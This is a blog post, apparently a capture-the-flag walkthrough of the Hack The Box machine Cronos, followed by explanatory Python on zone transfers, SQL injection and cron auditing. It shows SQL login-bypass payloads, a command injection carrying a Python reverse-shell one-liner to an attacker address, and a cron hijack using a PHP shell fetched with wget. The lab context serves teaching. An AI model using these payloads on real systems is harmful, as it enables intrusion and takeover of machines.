{"id":1530,"date":"2021-08-29T11:35:01","date_gmt":"2021-08-29T11:35:01","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1530"},"modified":"2021-08-29T11:35:01","modified_gmt":"2021-08-29T11:35:01","slug":"cronos","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/29\/cronos\/","title":{"rendered":"Cronos"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Level<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Cronos\" title=\"Cronos\">Cronos<\/a> - HTB<\/td>\n<td>Medium<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/f77c75f363afe0d0a6eeccf6a8d8c252.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Let's start with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)\n|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)\n|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)\n53\/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.10.3-P4-Ubuntu\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>I went to port 80 first and found nothing beyond the Apache default page. So I tried to gather information from port 53 instead. BIND is authoritative here, and a reverse lookup of the target's own address against it gives away the domain name.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# nslookup                                                                                                                                                                                          1 \u2a2f\n> server 10.10.10.13\nDefault server: 10.10.10.13\nAddress: 10.10.10.13#53\n> 10.10.10.13\n13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.\n> \n<\/code><\/pre>\n<p>Next I tried to enumerate all of the hosts. The name server answers a zone transfer (AXFR) request from anyone, so <code>host -l<\/code> simply lists the whole zone.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# host -l -a cronos.htb 10.10.10.13                     \nTrying &quot;cronos.htb&quot;\nUsing domain server:\nName: 10.10.10.13\nAddress: 10.10.10.13#53\nAliases: \n\n;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 26260\n;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;cronos.htb.            IN  AXFR\n\n;; ANSWER SECTION:\ncronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800\ncronos.htb.     604800  IN  NS  ns1.cronos.htb.\ncronos.htb.     604800  IN  A   10.10.10.13\nadmin.cronos.htb.   604800  IN  A   10.10.10.13\nns1.cronos.htb.     604800  IN  A   10.10.10.13\nwww.cronos.htb.     604800  IN  A   10.10.10.13\ncronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800\n\nReceived 192 bytes from 10.10.10.13#53 in 83 ms\n<\/code><\/pre>\n<p>I added these hosts to my \/etc\/hosts and carried on. All of them resolve to 10.10.10.13, so the Host header is what decides which site Apache serves; without the names you only ever see the default page.<\/p>\n<p>Scans with gobuster and dirb did not turn up anything important, but the login form on admin.cronos.htb looked like a SQL injection candidate. I found a SQL login-bypass wordlist on the internet and fed it to hydra as both the username and the password list. 
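The zone transfer above is the whole reconnaissance step, so here it is reproduced by hand. This is an added example, not code from the original post: a standard-library Python AXFR client that frames the query over TCP, parses the answer records (including RFC 1035 name compression) and produces the /etc/hosts line the write-up needed. The server address and zone name are the ones from the write-up; `sample_response()` is constructed here to mirror the zone shown above and is not captured traffic. On the server side the fix is BIND's `allow-transfer` option restricted to the secondaries (or `none;`), after which this client raises on the REFUSED response instead of listing hosts.

```python
import socket
import struct

QTYPE_A, QTYPE_NS, QTYPE_SOA, QTYPE_AXFR = 1, 2, 6, 252
TYPE_NAMES = {QTYPE_A: "A", QTYPE_NS: "NS", QTYPE_SOA: "SOA"}

def encode_name(name):
    """Encode 'cronos.htb' as length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"

def build_axfr_query(zone, txid=0x1234):
    """Header + one question with QTYPE 252 (AXFR), TCP-framed by a 2-byte length."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)      # flags 0: plain query, no RD
    question = encode_name(zone) + struct.pack(">HH", QTYPE_AXFR, 1)
    return struct.pack(">H", len(header) + len(question)) + header + question

def decode_name(msg, off):
    """Decode a possibly compressed name at `off`; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while hops < 64:                             # bound pointer loops from a hostile server
        ln = msg[off]
        if (ln & 0xC0) == 0xC0:                  # compression pointer, RFC 1035 4.1.4
            if end is None:
                end = off + 2
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            continue
        off += 1
        if ln == 0:
            return ".".join(labels), (off if end is None else end)
        labels.append(msg[off:off + ln].decode())
        off += ln
    raise ValueError("compression pointer loop")

def parse_records(msg):
    """Parse one DNS message; return answer RRs as (owner, type, value) tuples."""
    _, flags, qd, an, _, _ = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0xF:                              # RCODE 5 = REFUSED: transfers are restricted
        raise ValueError("server returned RCODE %d" % (flags & 0xF))
    off = 12
    for _ in range(qd):                          # skip the echoed question
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        owner, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        value = msg[off:off + rdlen].hex()       # fallback for record types not decoded below
        if rtype == QTYPE_A:
            value = ".".join(str(b) for b in msg[off:off + 4])
        elif rtype == QTYPE_NS:
            value, _ = decode_name(msg, off)
        elif rtype == QTYPE_SOA:
            mname, o = decode_name(msg, off)
            rname, o = decode_name(msg, o)
            value = "%s %s serial=%d" % (mname, rname, struct.unpack(">I", msg[o:o + 4])[0])
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), value))
        off += rdlen
    return records

def axfr(server, zone, port=53, timeout=5.0):
    """Run the transfer over TCP; a complete zone ends with a second copy of the SOA."""
    records, buf = [], b""
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(build_axfr_query(zone))
        while sum(r[1] == "SOA" for r in records) < 2:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
            while len(buf) >= 2 and len(buf) >= 2 + struct.unpack(">H", buf[:2])[0]:
                n = struct.unpack(">H", buf[:2])[0]
                msg, buf = buf[2:2 + n], buf[2 + n:]
                records += parse_records(msg)
    return records

def etc_hosts_lines(records):
    """One /etc/hosts line per address, listing every owner that has an A record for it."""
    by_ip = {}
    for owner, rtype, value in records:
        if rtype == "A" and owner not in by_ip.setdefault(value, []):
            by_ip[value].append(owner)
    return ["%s %s" % (ip, " ".join(names)) for ip, names in by_ip.items()]

def sample_response(txid=0x1234):
    """Constructed answer shaped like the cronos.htb zone above; not captured traffic."""
    zone_ptr = b"\xc0\x0c"                       # pointer to 'cronos.htb' in the question
    def rr(owner, rtype, rdata):
        return owner + struct.pack(">HHIH", rtype, 1, 604800, len(rdata)) + rdata
    soa = zone_ptr + b"\x05admin" + zone_ptr + struct.pack(">IIIII", 3, 604800, 86400, 2419200, 604800)
    answers = (rr(zone_ptr, QTYPE_SOA, soa)
               + rr(zone_ptr, QTYPE_NS, b"\x03ns1" + zone_ptr)
               + rr(zone_ptr, QTYPE_A, bytes([10, 10, 10, 13]))
               + rr(b"\x05admin" + zone_ptr, QTYPE_A, bytes([10, 10, 10, 13])))
    header = struct.pack(">HHHHHH", txid, 0x8400, 1, 4, 0, 0)    # QR=1, AA=1, RCODE=0
    return header + encode_name("cronos.htb") + struct.pack(">HH", QTYPE_AXFR, 1) + answers
```

`axfr("10.10.10.13", "cronos.htb")` performs the live transfer and returns the same tuples that `parse_records(sample_response())` returns offline; `etc_hosts_lines()` on either result gives the line to paste into /etc/hosts. The client stops reading after the second SOA because that is how a complete AXFR is delimited, and it raises rather than returning an empty list when the server answers with a non-zero RCODE.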
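Why three different usernames log in against every password in the list: this is an added example, not the site's login code (the post does not show it). An in-memory SQLite table stands in for the application's database and the credential is a placeholder, both assumptions; the query shape `username='...' AND password='...'` is the usual string-concatenation pattern that these payloads target. The bypass strings are the three usernames hydra reports further down, and the fixed handler shows the same query with bound parameters, where the quotes stay data.

```python
import sqlite3

def make_db():
    """Constructed users table; the credential is a placeholder, not the box's."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'placeholder-password')")
    return con

def build_vulnerable_query(username, password):
    """The statement a concatenating login handler actually sends to the database."""
    return ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
            % (username, password))

def login_vulnerable(con, username, password):
    """String concatenation: a quote in the input rewrites the WHERE clause."""
    return con.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0

def login_fixed(con, username, password):
    """Bound parameters: values travel separately from the SQL text, so quotes stay data."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0

# The three usernames hydra reported. With any of them the WHERE clause is always
# true, so the password hydra paired them with is irrelevant.
HYDRA_HITS = ["' or 1 or '", "admin' or '", "admin' or '1'='2"]

def bypasses(con, payloads, password="whatever"):
    """Payloads that log in through the vulnerable handler but not through the fixed one."""
    return [p for p in payloads
            if login_vulnerable(con, p, password) and not login_fixed(con, p, password)]
```

`bypasses(make_db(), HYDRA_HITS)` returns all three payloads; `build_vulnerable_query("' or 1 or '", "x")` shows why, since the clause becomes `username='' or 1 or '' AND password='x'`, and `AND` binds tighter than `OR`. SQLite evaluates these exactly as MySQL would for this shape, but treat that as the assumption it is if the target runs something else.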
The wordlist is from: <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/login-bypass\/sql-login-bypass\">https:\/\/book.hacktricks.xyz\/pentesting-web\/login-bypass\/sql-login-bypass<\/a>. One caveat with hydra's http-post-form module: the last field is a failure string, so every response that does not contain &quot;Your Login Name or Password is invalid&quot; is reported as a hit, and the list below has to be read with that in mind. Using the same 806-line file as both -L and -P also means 806 x 806 = 649636 attempts; one fixed password against the username list would have found the same injections in 806 requests, because once the username payload is in place the password no longer matters.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form &quot;\/:username=^USER^&amp;password=^PASS^:Your Login Name or Password is invalid&quot;\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-08-28 04:53:30\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806\/p:806), ~40603 tries per task\n[DATA] attacking http-post-form:\/\/admin.cronos.htb:80\/:username=^USER^&amp;password=^PASS^:Your Login Name or Password is invalid\n[STATUS] 1588.00 tries\/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active\n[STATUS] 1611.33 tries\/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: password\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: root\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: test\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: guest\n[80][http-post-form] host: 
admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or 1]%00\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039;or string-length(name(.))&lt;10 or&#039;\n[STATUS] 1729.00 tries\/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: password\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: root\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: test\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or 
1]%00\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: guest\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039;or string-length(name(.))&lt;10 or&#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: password\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: root\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: test\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: guest\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: 
admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or 1]%00\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039;or string-length(name(.))&lt;10 or&#039;\n^CThe session file .\/hydra.restore was written. Type &quot;hydra -R&quot; to resume session.\n<\/code><\/pre>\n<p>Great, now let's log in. Any of the three usernames hydra found works on its own: <code>&#039; or 1 or &#039;<\/code>, <code>admin&#039; or &#039;<\/code> and <code>admin&#039; or &#039;1&#039;=&#039;2<\/code> each turn the WHERE clause into a condition that is always true, so the password value is irrelevant, which is also why hydra printed every password for each of them. After logging in I saw a page () where we could run commands. It takes an IP address, so I appended my own command after a <code>;<\/code> and submitted the following:<\/p>\n<pre><code>8.8.8.8; python -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);&#039;<\/code><\/pre>\n<p>I sent this payload and caught a reverse shell on my listener.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# nc -lvp 1234       \nlistening on [any] 1234 ...\nconnect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n$ \n<\/code><\/pre>\n<p>I could read the user flag directly as www-data; first I upgraded to a proper tty with python's pty module.<\/p>\n<pre><code class=\"language-sh\">python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ id\nid\nuid=33(www-data) gid=33(www-data) 
groups=33(www-data)\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ cd \/home\ncd \/home\nwww-data@cronos:\/home$ ls\nls\nnoulis\nwww-data@cronos:\/home$ cd noulis\ncd noulis\nwww-data@cronos:\/home\/noulis$ ls\nls\nuser.txt\nwww-data@cronos:\/home\/noulis$ cat user.txt\ncat user.txt\n51d236438b333970dbba7dc3089be33b\n<\/code><\/pre>\n<p>While looking around I noticed a system cron entry (the line carries a user field, so it is in \/etc\/crontab or \/etc\/cron.d form) that runs the Laravel <code>artisan<\/code> script as root every minute, and I had write access to the file. Since cron invokes it with <code>php<\/code>, the replacement has to be a PHP reverse shell: I prepared one and fetched it onto the machine with wget. It was saved as artisan.1 because artisan already existed, hence the rm and mv to put it in place. Then I started a listener, waited for the next minute, and the shell came back as root.<\/p>\n<pre><code>* * * * *     root   php \/var\/www\/laravel\/artisan schedule:run &gt;&gt; \/dev\/null 2&gt;&amp;1<\/code><\/pre>\n<pre><code class=\"language-sh\">\nwww-data@cronos:\/var\/www\/laravel$ wget http:\/\/10.10.14.4\/artisan\nwget http:\/\/10.10.14.4\/artisan\n--2021-08-29 12:52:12--  http:\/\/10.10.14.4\/artisan\nConnecting to 10.10.14.4:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 5492 (5.4K) [application\/octet-stream]\nSaving to: &#039;artisan.1&#039;\n\nartisan.1           100%[===================&gt;]   5.36K  --.-KB\/s    in 0s      \n\n2021-08-29 12:52:12 (471 MB\/s) - &#039;artisan.1&#039; saved [5492\/5492]\n\nwww-data@cronos:\/var\/www\/laravel$ rm artisan\nrm artisan\nwww-data@cronos:\/var\/www\/laravel$ mv artisan.1 artisan\nmv artisan.1 artisan\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/PEASS-ng\/linPEAS]\n\u2514\u2500# nc -vlp 4444                                                                                       130 \u2a2f\nlistening on [any] 4444 ...\nconnect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342\nLinux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU\/Linux\n 12:53:01 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=0(root) gid=0(root) groups=0(root)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\n# ls\nroot.txt\n# cat root.txt\n1703b8a3c9a8dde879942c79d02fd3a0\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Level OS Logo Cronos &#8211; HTB Medium Linux Walkthrough Let's start with an nmap scan. 
PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.2p2 Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/29\/cronos\/\">Read more<span class=\"screen-reader-text\">Cronos<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[613],"class_list":["post-1530","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-dns-zone-transfer","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1530"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530\/revisions"}],"predecessor-version":[{"id":1531,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530\/revisions\/1531"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
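A check for the privilege-escalation step in the walkthrough above: root cron jobs whose target file the current user can write to, or can replace because the containing directory is writable (the rm and mv the write-up used work in either case). This is an added example, not code from the original post. `SAMPLE_CRONTAB` is constructed here around the artisan line quoted in the post, with two extra lines for contrast; the `exists` and `writable` hooks on `audit()` are there so it can be run against a made-up filesystem as well as the real one.

```python
import os
import shlex

# Constructed /etc/crontab-style text. The artisan line is the one quoted in the
# write-up; the backup.sh (root, read-only) and sync.sh (non-root) lines are added
# here so the audit has something to reject.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *     root   php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
@daily        root   /usr/local/bin/backup.sh
*/5 * * * *   noulis /home/noulis/sync.sh
"""

def parse_system_crontab(text):
    """Yield (user, command) from system-crontab lines: user is the 6th field, or the 2nd after an @tag."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                          # environment assignment such as PATH=...
            continue
        if first.startswith("@"):                 # @reboot, @daily, ...
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]

def absolute_paths(command):
    """Absolute paths named in a command, skipping redirection targets such as /dev/null."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    paths, skip_next = [], False
    for tok in tokens:
        if skip_next:
            skip_next = False
        elif tok in (">", ">>", "<", "2>", "&>"):
            skip_next = True
        elif tok.startswith("/"):
            paths.append(tok)
    return paths

def audit(text, exists=os.path.isfile, writable=lambda p: os.access(p, os.W_OK)):
    """Root cron commands that touch a file this user can change or replace.

    Returns (path, command, reason) tuples. The directory check matters because a
    writable directory lets you unlink and recreate a file you could not edit.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in absolute_paths(command):
            if not exists(path):
                continue
            reasons = []
            if writable(path):
                reasons.append("file is writable")
            if writable(os.path.dirname(path)):
                reasons.append("parent directory is writable, file can be replaced")
            if reasons:
                findings.append((path, command, "; ".join(reasons)))
    return findings

if __name__ == "__main__":
    text = SAMPLE_CRONTAB
    if os.path.isfile("/etc/crontab"):            # on a real host, read the system crontab
        with open("/etc/crontab") as f:
            text = f.read()
    for path, command, why in audit(text):
        print("%s\n  %s\n  %s" % (path, why, command))
```

Run as the low-privileged shell user, the script reports `/var/www/laravel/artisan` with both reasons on a box laid out like this one; `/etc/cron.d/*` entries use the same six-field format and can be fed to `audit()` the same way. The `php` interpreter in the artisan line is found through cron's `PATH`, which is why only the script path is checked here.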